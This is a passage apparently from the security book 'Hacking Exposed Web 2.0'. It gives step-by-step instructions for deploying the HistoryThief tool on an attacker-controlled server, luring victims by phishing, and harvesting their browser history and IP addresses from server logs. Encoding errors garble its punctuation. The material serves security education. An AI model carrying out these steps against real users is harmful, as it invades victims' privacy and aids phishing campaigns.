Download the tool, HistoryThief.zip, available at www.isecpartners.com/tools
.html, and host it on a web server under the attacker??™s control??”such as www
.cybervillains.com/historythief.html.
2. The attacker edits historythief.html and modi?¬? es the attackersite variable
on line 62 to point to the web server under her control. When a victim views
the page, any URLs visited that are in the prede?¬? ned list will be sent to the
attacker??™s web server address. The attacker can then read her web server logs to
see the victim??™s IP address and matched history URLs.
3. If the attacker wants, she can modify the prede?¬? ned list of URLs contained
in the web sites array. This is the list of URLs for which the victim??™s browser
history will be checked.
4. The attacker then forces the victim to view the www.cybervillains.com/
historythief.html URL through an attack such as a phishing e-mail or a browser
vulnerability.
96 Hacking Exposed Web 2.0
5. Finally, the attacker views her web server logs and obtains the victim??™s browser
history. As shown in Figure 4-5, the victim??™s browser issues a request to the
attacker??™s web server, which requests /historythief?. This is followed by any
URLs that were previously de?¬? ned in HistoryThief that the victim has already
visited (in this case, HistoryThief shows that the victim has previously viewed
www.
Pages:
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198